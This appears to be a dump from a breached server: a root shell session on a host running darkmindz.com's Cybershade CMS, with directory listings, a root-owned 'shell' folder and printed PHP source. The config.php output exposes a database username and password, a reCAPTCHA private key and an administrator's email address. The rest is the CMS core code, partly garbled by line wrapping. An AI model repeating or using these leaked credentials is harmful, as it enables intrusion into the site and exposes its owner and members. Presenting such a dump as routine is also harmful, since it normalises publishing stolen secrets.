drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
|
||
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
|
||
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
|
||
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
|
||
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
|
||
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
|
||
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
|
||
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
|
||
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
|
||
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
|
||
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
|
||
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
|
||
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
|
||
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
|
||
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
|
||
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
|
||
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
|
||
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
|
||
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
|
||
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
|
||
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
|
||
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
|
||
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
|
||
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
|
||
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
|
||
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
|
||
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
|
||
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
|
||
-rw-r--r-- 1 romeo romeo 46488756 May 23 04:08 stress_test.txt
|
||
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
|
||
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
|
||
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
|
||
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
|
||
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
|
||
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
|
||
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
|
||
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
|
||
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
|
||
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
|
||
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# less ucp.php
|
||
<?php
|
||
/*======================================================================*\
|
||
| Cybershade CMS - Your CMS, Your Way |
|
||
\*======================================================================*/
|
||
define('INDEX_CHECK', 1);
|
||
define('CMS_DEBUG', 0);
|
||
define('CMS_MENU', 'ucp');
|
||
$cms_root = '';
|
||
$page_name = 'Profile';
|
||
include $cms_root."core/core.php";
|
||
if (!$_user->is_online){redirect("/".root()."index.php");}
|
||
|
||
$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
|
||
$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
|
||
$switch = isset($_GET['action']) ? $_GET['action'] : '';
|
||
|
||
$uid = $config['global']['user']['id'];
|
||
if((int)isset($_GET['uid']) &&
|
||
$_user->check_permissions($config['global']['user
|
||
']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
|
||
$uid = (int)$_GET['uid'];
|
||
}else{
|
||
$uid = $config['global']['user']['id'];
|
||
ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# cd core
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
|
||
core]# ls -al
|
||
total 164
|
||
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 .
|
||
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
|
||
-rw-r--r-- 1 romeo romeo 731 Jan 13 07:34 admin.js
|
||
-rw-r--r-- 1 romeo romeo 27395 Feb 18 09:08 base_functions.php
|
||
-rw-r--r-- 1 romeo romeo 9098 Feb 21 10:50 bbcode_tags.php
|
||
-rw-r--r-- 1 romeo romeo 2816 Feb 1 08:55 cacher.php
|
||
drwxr-xr-x 4 romeo romeo 4096 Feb 10 13:29 classes
|
||
-rw-r--r-- 1 romeo romeo 1436 Feb 2 08:33 cli.php
|
||
-rw-r--r-- 1 romeo romeo 2848 Feb 8 08:46 config.php
|
||
-rw-r--r-- 1 romeo romeo 23810 Apr 19 16:45 core.php
|
||
-rw-r--r-- 1 romeo romeo 4518 Feb 1 08:55 cron.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 err
|
||
-rw-r--r-- 1 romeo romeo 236 Feb 2 08:33 force_user.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 functions
|
||
-rw-r--r-- 1 romeo romeo 1181 Feb 2 08:33 key.php
|
||
-rw-r--r-- 1 romeo romeo 6903 Feb 2 08:33 mailer.php
|
||
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 mint
|
||
-rw-r--r-- 1 romeo romeo 3054 Feb 14 06:17 page_footer.php
|
||
-rw-r--r-- 1 romeo romeo 5935 Feb 14 06:17 page_header.php
|
||
-rw-r--r-- 1 romeo romeo 9762 Feb 2 08:33 recaptchalib.php
|
||
-rw-r--r-- 1 romeo romeo 6658 Apr 26 07:51 security.php
|
||
-rw-r--r-- 1 romeo romeo 2021 Feb 2 08:33 usertracker.php
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
|
||
core]# cat config.php
|
||
<?php
|
||
//Cybershade.Org
|
||
|
||
//Database Stuff
|
||
$config['db']['host'] = 'localhost';
|
||
$config['db']['username'] = 'romeo_romeo';
|
||
$config['db']['password'] = 'swU55ath';
|
||
$config['db']['database'] = 'romeo_DMZ_CS';
|
||
$config['db']['prefix'] = 'dmz_';
|
||
$config['db']['shrfix'] = 'shr_'; //the prefix
|
||
for the shared tables
|
||
$config['db']['ckefix'] = 'CMS_'; //the cookie prefix
|
||
$config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
|
||
is also a good way to invalidate the autologins on cms update
|
||
$config['site']['working_dir'] = '';
|
||
|
||
//config vars for if we loose the DB
|
||
$config['cms']['name'] = 'DarkMindZ';
|
||
$config['cms']['version'] = '_DDoS';
|
||
$config['cms']['debug'] = "0";
|
||
$config['site']['title'] = 'CyberShade CMS';
|
||
$config['site']['theme'] = 'cs';
|
||
$config['site']['language'] = 'en';
|
||
$config['site']['keywords'] = '';
|
||
$config['site']['description'] = '';
|
||
$config['site']['max_login_tries'] = "5";
|
||
$config['site']['time'] = 'jS F h:ia';
|
||
$config['site']['template_override'] = "1";
|
||
$config['site']['auto_login'] = "1";
|
||
$config['site']['ips_max_before_ban'] = "5";
|
||
|
||
$config['site']['hourly_time'] = 3600; //1 Hour
|
||
$config['site']['daily_time'] = (3600*24); //1 Day
|
||
$config['site']['weekly_time'] = (3600*24*7); //1 Week
|
||
|
||
$config['site']['default_module'] = 'core';
|
||
$config['site']['closed'] = "0";
|
||
$config['site']['admin_email'] = 'romeo.haxxor@gmail.com';
|
||
$config['site']['usernamechange'] = "0";
|
||
$config['site']['fc_update'] = "1220620615";
|
||
$config['site']['paginate'] = "8";
|
||
$config['site']['news_cat'] = "2";
|
||
$config['site']['captcha_pub'] =
|
||
'6Lf-qAQAAAAAANqWAU4YSnkwdy0M2mClwO3IOhTe';
|
||
$config['site']['captcha_priv'] =
|
||
'6Lf-qAQAAAAAAOLgdFyr4dAhaDnnx2Nic0Wlpf6Q ';
|
||
$config['site']['announcement'] = 'No Current Announcements, This may
|
||
be because the Database has gone down.';
|
||
$config['rss']['global_limit'] = "15";
|
||
$config['site']['max_whitelist'] = "5";
|
||
$config['movemod']['move_enabled'] = "0";
|
||
$config['site']['quick_replys'] = "0";
|
||
$config['site']['users_online'] = "0";
|
||
$config['site']['guests_online'] = "0";
|
||
|
||
//Statistics shit fort the same reason (Only used when the DB is inactive,
|
||
setting it to time() + 9999999 means the cron will never be run)
|
||
$config['statistics']['hourly_cron'] = "9999999999999";
|
||
$config['statistics']['daily_cron'] = "9999999999999";
|
||
$config['statistics']['weekly_cron'] = "9999999999999";
|
||
$config['statistics']['total_members'] = 'N/A, (DDoS)';
|
||
$config['statistics']['last_user_user'] = 'N/A, (DDoS)';
|
||
$config['statistics']['last_user_id'] = 'N/A, (DDoS)';
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
|
||
core]# cat core.php
|
||
<?php
|
||
/*======================================================================*\
|
||
| Cybershade CMS - Your CMS, Your Way. |
|
||
\*======================================================================*/
|
||
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
|
||
|
||
error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
|
||
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
|
||
//this is to start the generation timer off
|
||
$gen_time = microtime();
|
||
|
||
//Include the session stuff
|
||
if(!SMODE) require($cms_root."core/classes/class.session.php");
|
||
if(SMODE) require($cms_root."core/classes/classes.php");
|
||
$_sess = new session;
|
||
|
||
//Set the headers
|
||
header("Cache-control: private");
|
||
header("Content-Type: text/html; charset=utf-8");
|
||
//ob_start("ob_gzhandler");
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Include the core CMS files needed -------------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//The config files
|
||
require($cms_root."core/config.php");
|
||
|
||
/*this is the ultimate cache-er xD, k so basically u got
|
||
* the var below which "allows" the static cacher through
|
||
*/
|
||
|
||
#$allow = true;
|
||
|
||
//this little switch decided what should be auto cache'd
|
||
/*switch(CMS_MENU){
|
||
case 'forum': $allow = false; break;
|
||
case 'admin': $allow = false; break;
|
||
case 'ucp': $allow = false; break;
|
||
case 'login': $allow = false; break;
|
||
case 'main': $allow = false; break;
|
||
case 'pm': $allow = false; break;
|
||
default: $allow = true; break;
|
||
}
|
||
|
||
if($allow){
|
||
// Get the modification date of this PHP file
|
||
$timestamps = array(@getlastmod());
|
||
|
||
// The latest of these modification dates is our real Last-Modified date
|
||
$timestamp = max($timestamps);
|
||
|
||
// Note that this is not a RFC 822 date (the tz is always GMT)
|
||
$tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
|
||
|
||
// Check if the client has the same page cached
|
||
if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
|
||
($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
|
||
header("HTTP/1.1 304 Not Modified");
|
||
exit();
|
||
}
|
||
// Inform the user what is our last modification date
|
||
else {
|
||
header("Last-Modified: " . $tsstring);
|
||
}
|
||
}*/
|
||
|
||
//The class files
|
||
require($cms_root."core/classes/class.sql.php");
|
||
if(!SMODE)require($cms_root."core/classes/class.login.php");
|
||
if(!SMODE)require($cms_root."core/classes/class.user.php");
|
||
if(!SMODE)require($cms_root."core/classes/class.form.php");
|
||
if(!SMODE)require($cms_root."core/classes/class.time.php");
|
||
require($cms_root."core/classes/class.nbbc.php");
|
||
require($cms_root."core/classes/class.tpl.php");
|
||
if(!SMODE)require($cms_root."core/classes/class.cache.php");
|
||
require($cms_root."core/classes/class.geshi.php");
|
||
|
||
//The base functions
|
||
require($cms_root."core/base_functions.php");
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Sort out the cached config stuff---------------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
$config_db = array();
|
||
//check see if the config file exists, if not then just create a blank config
|
||
variable
|
||
if(file_exists($cms_root."cache/cache_config.php")){ include
|
||
$cms_root."cache/cache_config.php"; }
|
||
|
||
//If the config_db is not null, cached.. then use it.
|
||
if($config_db !== NULL){
|
||
foreach($config_db as $array){
|
||
$config[$array['array']][$array['var']] = $array['value'];
|
||
}
|
||
unset($array);
|
||
}
|
||
|
||
if(isset($_GET['_site'])){
|
||
$a=(isset($_GET['_site']) ? $_GET['_site'] :
|
||
(isset($_SESSION['site']['mode']) ? $_SESSION['site']['mode'] :
|
||
$config['db']['prefix']));
|
||
switch($a){
|
||
case 'dmz':
|
||
$_SESSION['site']['mode'] = 'dmz_';
|
||
break;
|
||
case 'cs':
|
||
$_SESSION['site']['mode'] = 'cs_';
|
||
break;
|
||
default:
|
||
}
|
||
}
|
||
if(isset($_SESSION['site']['mode']))
|
||
$config['db']['prefix'] = $_SESSION['site']['mode'];
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Define new instances of required classes-------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//start the sql
|
||
$_sql = new sql(true);
|
||
$_sql->config = $config;
|
||
if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
|
||
if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
|
||
|
||
|
||
//Open the session stuff
|
||
$_sess->sql = $_sql;
|
||
$_sess->config = $config;
|
||
|
||
//start the form class
|
||
$_form = new form;
|
||
|
||
//start the user class
|
||
$_user = new user;
|
||
$_user->config = $config;
|
||
$_user->sql = $_sql;
|
||
|
||
|
||
//start the login
|
||
$_login = new login((isset($config['site']['autologin']) ? true : false));
|
||
$_login->config = $config;
|
||
$_login->sql = $_sql;
|
||
$_login->form = $_form;
|
||
$_login->sess = $_sess;
|
||
$_login->user = $_user;
|
||
$_user->login = $_login;
|
||
|
||
//require($cms_root."core/key.php");
|
||
|
||
//start the time class
|
||
$_time = new time;
|
||
$_time->config = $config;
|
||
|
||
//start the bbcode class
|
||
$_bbcode = new bbcode;
|
||
$_bbcode->SetDebug(true);
|
||
$_bbcode->SetDetectURLs(false);
|
||
$_bbcode->SetURLPattern('<a href="{$url/h}">{$text/h} <img
|
||
src="/'.root().'images/external.gif" width="11" height="11" alt="External Link"
|
||
/></a>');
|
||
$_bbcode->ClearSmileys();
|
||
$_bbcode->SetSmileyDir('/'.root().'images/smilies');
|
||
include($cms_root."core/bbcode_tags.php");
|
||
|
||
$_bbcode->user = $_user;
|
||
$_user->bbcode = $_bbcode;
|
||
|
||
//start the cache && template classes
|
||
$_cache_path = $cms_root."cache/";
|
||
if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
|
||
$_cache_ = (is_writable($_cache_path) ? true : false);
|
||
$_cache = new Cache($_sql, $_cache_path, $_cache_);
|
||
$_cache->config = $config['db'];
|
||
|
||
//regenerate the site cache
|
||
if($config!==NULL || !empty($config)){
|
||
$config_db = $_cache->generate_cache("config_db", "cache_config.php",
|
||
"SELECT * FROM ".$config['db']['prefix']."config");
|
||
foreach($config_db as $array){
|
||
$config[$array['array']][$array['var']] = $array['value'];
|
||
}
|
||
unset($array,$config_db);
|
||
}
|
||
|
||
//start the template class
|
||
$_template = new template('.', $_cache_, $_cache_path."files/");
|
||
$_template->cms_root = $cms_root;
|
||
$_template->user = $_user;
|
||
|
||
$_login->template = $_template;
|
||
|
||
//start the language class
|
||
$_language = $config['site']['language'];
|
||
if(isset($_SESSION['user']['language'])){
|
||
|
||
if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
|
||
){
|
||
$_language = $_SESSION['user']['language'];
|
||
}
|
||
}
|
||
require($cms_root."language/".$_language."/main.php");
|
||
$_time->cur_lang = $_language;
|
||
|
||
//run the lang pass function on the language vars AFTER we included the base
|
||
functions.
|
||
foreach($_lang as $key => $value){
|
||
if(!is_array($_lang[$key])){
|
||
$_lang[$key] = lang_pass($_lang[$key]);
|
||
}
|
||
}
|
||
|
||
$_time->lang = $_lang;
|
||
$_bbcode->lang = $_lang;
|
||
$_login->lang = $_lang;
|
||
//Include the security files.. recaptchalib maybe add into the login class
|
||
require($cms_root."core/security.php");
|
||
|
||
require($cms_root."core/classes/class.captcha.php");
|
||
$_captcha = new Captcha($config['site']['captcha_pub'],
|
||
$config['site']['captcha_priv']);
|
||
|
||
$_cms_root = $cms_root;
|
||
//Include the mailer
|
||
require($cms_root."core/mailer.php");
|
||
$cms_root = $_cms_root;
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Continue with the configuration----------------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
define('ADMIN', 9);
|
||
define('DEV', 8);
|
||
define('GMOD', 7);
|
||
define('MOD', 5);
|
||
define('USER', 1);
|
||
define('BANNED', 0);
|
||
|
||
//add some stuff to the config
|
||
|
||
//generate guest defaults
|
||
$guest['user']['id'] = '0';
|
||
$guest['user']['username'] = 'Guest';
|
||
$guest['user']['theme'] = $config['site']['theme'];
|
||
$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
|
||
$_SESSION['user']['userkey'] : NULL;
|
||
|
||
//generate user stuff
|
||
$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
|
||
: $guest['user']);
|
||
$config['global']['ip'] = getIP();
|
||
$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
|
||
$_SERVER['HTTP_USER_AGENT'] : NULL);
|
||
$config['site']['guests_online'] = (isset($guests_online) &&
|
||
is_numeric($guests_online) ? $guests_online : 0);
|
||
$config['site']['users_online'] = (isset($_users_online) &&
|
||
is_numeric($_users_online) ? $_users_online : 0);
|
||
$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
|
||
: false;
|
||
|
||
#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}
|
||
|
||
$tpl = $config['site']['theme'];
|
||
if($config['site']['template_override']){
|
||
if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
|
||
}else{
|
||
if(isset($config['global']['user']['template']) &&
|
||
is_dir($cms_root."template/".$config['global']['user']['template']."/")){
|
||
$tpl = $config['global']['user']['template'];
|
||
}
|
||
}
|
||
$_template->config = $config;
|
||
$_template->tpl = $tpl;
|
||
|
||
//None of these should be defined as vars as they can be over writtin.. They
|
||
are defines
|
||
$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
|
||
$config['site']['default_module']);
|
||
$_user_temp = $cms_root."template/".$tpl."/";
|
||
$_module_temp = $cms_root."modules/".$_module."/template/";
|
||
|
||
if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
|
||
unset($_SESSION['login']);
|
||
}
|
||
|
||
$_template->set_rootdir($cms_root);
|
||
|
||
define('IS_MOD', $_user->check_permissions($config['global']['user']['id'],
|
||
MOD));
|
||
define('IS_GMOD', $_user->check_permissions($config['global']['user']['id'],
|
||
GMOD));
|
||
define('IS_DEV', $_user->check_permissions($config['global']['user']['id'],
|
||
DEV));
|
||
define('IS_ADMIN', $_user->check_permissions($config['global']['user']['id'],
|
||
ADMIN));
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Grab the neccesarry cache files----------------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//this defines which of the cache files to include
|
||
//require($cms_root.'core/cacher.php');
|
||
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//--Cacher.php-------------------------------------------------------------//
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
|
||
'user_permissions', NULL);#'badwords', 'affiliates',
|
||
$x=0;
|
||
include($cms_root."cache/cache.php");
|
||
while($var = $cache_gen[$x]){
|
||
if($var != ''){
|
||
$gen = NULL;
|
||
eval('$gen = $'.$var.'_db;');
|
||
|
||
/*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
|
||
include($cms_root."cache/cache_".$var.".php");
|
||
eval('$gen = $'.$var.'_db;');
|
||
}*/
|
||
if ($gen !== NULL || !empty($gen)){
|
||
foreach($gen as $k => $v){
|
||
$config[$var][$k] = $v;
|
||
}
|
||
}else{
|
||
//regenerate the cache if not avalible
|
||
switch($var){
|
||
case 'config':
|
||
$config[$var] = $_cache->generate_cache("config_db",
|
||
"cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
|
||
break;
|
||
case 'minimenu':
|
||
$config[$var] = $_cache->generate_cache("minimenu_db",
|
||
"cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
|
||
disporder ASC");
|
||
break;
|
||
|
||
case 'menu':
|
||
$config[$var] = $_cache->generate_cache("menu_db",
|
||
"cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
|
||
ASC", NNUM);
|
||
:
|
||
break;
|
||
|
||
case 'statistics':
|
||
$config[$var] = $_cache->generate_statistics_cache();
|
||
break;
|
||
|
||
case 'groups':
|
||
$config[$var] = $_cache->generate_cache("groups_db",
|
||
"cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
|
||
rank DESC");
|
||
break;
|
||
case 'bans':
|
||
$config[$var] = $_cache->generate_cache("bans_db",
|
||
"cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
|
||
break;
|
||
//case 'affiliates':
|
||
// $config[$var] =
|
||
$_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
|
||
".$config['db']['prefix']."affiliates");
|
||
//break;
|
||
//case 'module_permissions':
|
||
// $config[$var] =
|
||
$_cache->generate_cache("module_permissions_db",
|
||
"cache_module_permissions.php", "SELECT * FROM
|
||
".$config['db']['prefix']."module_permissions");
|
||
//break;
|
||
case 'user_permissions':
|
||
$config[$var] = $_cache->generate_upermissions_cache();
|
||
|
||
break;
|
||
}
|
||
|
||
}
|
||
}
|
||
$x++;
|
||
}
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//--Cacher.php-------------------------------------------------------------//
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
|
||
$_user->groups = $config['groups'];
|
||
//$_user->module_permissions = $config['module_permissions'];
|
||
$_user->permissions = $config['user_permissions'];
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Cron - This will sort the majority of the cache and--------------------//
|
||
//---------db problems out for us------------------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//include($cms_root.'core/cron.php');
|
||
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//--Cron.php---------------------------------------------------------------//
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
if(!defined('NO_DB')){
|
||
$hourly_cron = FALSE;
|
||
if(isset($config['site']['hourly_time'])){
|
||
if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
|
||
$_sql->updateRow("statistics", array('value' => time()),
|
||
"variable = 'hourly_cron'");
|
||
$hourly_cron = TRUE;
|
||
} else {
|
||
if($config['site']['hourly_time'] == 0){
|
||
$hourly_cron = TRUE;
|
||
}else{
|
||
if((time() - $config['site']['hourly_time']) >
|
||
$config['statistics']['hourly_cron']){
|
||
$_sql->updateRow("statistics", array('value' =>
|
||
time()), "variable = 'hourly_cron'");
|
||
$hourly_cron = TRUE;
|
||
}
|
||
:
|
||
}
|
||
}
|
||
}
|
||
|
||
$daily_cron = FALSE;
|
||
if(isset($config['site']['daily_time'])){
|
||
if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
|
||
$_sql->updateRow("statistics", array('value' => time()),
|
||
"variable = 'daily_cron'");
|
||
$daily_cron = TRUE;
|
||
} else {
|
||
if($config['site']['daily_time'] == 0){
|
||
$daily_cron = TRUE;
|
||
}else{
|
||
if((time() - $config['site']['daily_time']) >
|
||
$config['statistics']['daily_cron']){
|
||
$_sql->updateRow("statistics", array('value' =>
|
||
time()), "variable = 'daily_cron'");
|
||
$daily_cron = TRUE;
|
||
}
|
||
}
|
||
}
|
||
}
|
||
|
||
$weekly_cron = FALSE;
|
||
if(isset($config['site']['weekly_time'])){
|
||
if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
|
||
$_sql->updateRow("statistics", array('value' => time()),
|
||
"variable = 'weekly_cron'");
|
||
$weekly_cron = TRUE;
|
||
} else {
|
||
if($config['site']['weekly_time'] == 0){
|
||
$weekly_cron = TRUE;
|
||
}else{
|
||
if((time() - $config['site']['weekly_time']) >
|
||
$config['statistics']['weekly_cron']){
|
||
$_sql->updateRow("statistics", array('value' =>
|
||
time()), "variable = 'weekly_cron'");
|
||
$weekly_cron = TRUE;
|
||
}
|
||
}
|
||
}
|
||
}
|
||
}
|
||
|
||
$stat_cache = false;
|
||
if(!defined('NO_DB')){
|
||
if($hourly_cron){
|
||
$_sql->record_message('Hourly CRON is running');
|
||
//delete users from sql that are inactive and set users offline
|
||
that are inactive too
|
||
$_sql->query("UPDATE shr_users
|
||
SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
|
||
cs_online.uid = shr_users.id)
|
||
WHERE EXISTS
|
||
( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
|
||
shr_users.id)");
|
||
$_sql->deleteRow('online', "login_time <
|
||
".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
|
||
".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
|
||
$_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
|
||
"66.249%"');
|
||
$_cache->generate_statistics_cache();
|
||
$stat_cache = true;
|
||
|
||
}
|
||
|
||
if($daily_cron){
|
||
$_sql->record_message('Daily CRON is running');
|
||
//update caches
|
||
if(!$stat_cache){
|
||
$_cache->generate_statistics_cache();
|
||
$stat_cache = true;
|
||
:
|
||
}
|
||
|
||
if($config['forum']['auto_lock']){
|
||
//Auto Lock Thread Timer
|
||
$ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
|
||
'', 1);
|
||
$_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
|
||
<= $ex", 1);
|
||
}
|
||
|
||
$_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
|
||
expire < ".time()."");
|
||
|
||
$_cache->generate_upermissions_cache();
|
||
$_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
|
||
FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
|
||
$_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
|
||
FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
|
||
//$_cache->generate_cache("module_permissions_db",
|
||
"cache_module_permissions.php", "SELECT * FROM
|
||
".$config['db']['prefix']."module_permissions");
|
||
|
||
}
|
||
|
||
if($weekly_cron){
|
||
$_sql->record_message('Weekly CRON is running');
|
||
if(!$stat_cache){
|
||
$_cache->generate_statistics_cache();
|
||
$stat_cache = true;
|
||
}
|
||
|
||
$_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
|
||
".$config['db']['prefix']."config");
|
||
$_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
|
||
FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");
|
||
|
||
//Optimise all of the tables in the DB
|
||
$alltables = $_sql->getTable("SHOW TABLES");
|
||
$tables = '';
|
||
$counter = count($alltables);
|
||
$x = 0;
|
||
$add = ", ";
|
||
foreach($alltables as $table){
|
||
foreach ($table as $tablename){
|
||
if($x == ($counter-1)){
|
||
$add = '';
|
||
}
|
||
$tables .= "`$tablename`$add";
|
||
$x++;
|
||
}
|
||
}
|
||
$_sql->query("OPTIMIZE TABLE $tables");
|
||
$_sql->updateRow("statistics", array('value' => time()), "variable
|
||
= 'weekly_time'", FALSE);
|
||
}
|
||
|
||
if($weekly_cron || $daily_cron || $hourly_cron){
|
||
define('FILE_MERGE', 1);
|
||
include($cms_root.'merge.php');
|
||
}
|
||
}
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
//--Cron.php---------------------------------------------------------------//
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Check weather the site is closed---------------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
|
||
if (!$_user->check_permissions($config['global']['user']['id'],
|
||
ADMIN)){
|
||
die(die_error(4));
|
||
:
|
||
}
|
||
}
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
//--Check weather a user is banned-----------------------------------------//
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
/**
|
||
if ($config['bans'] != NULL){
|
||
foreach ($config['bans'] as $bans){
|
||
if ($bans['user_ip'] == $config['global']['ip']){
|
||
die(die_error($bans['die']));
|
||
}
|
||
}
|
||
}
|
||
**/
|
||
|
||
/////////////////////////////////////////////////////////////////////////////
|
||
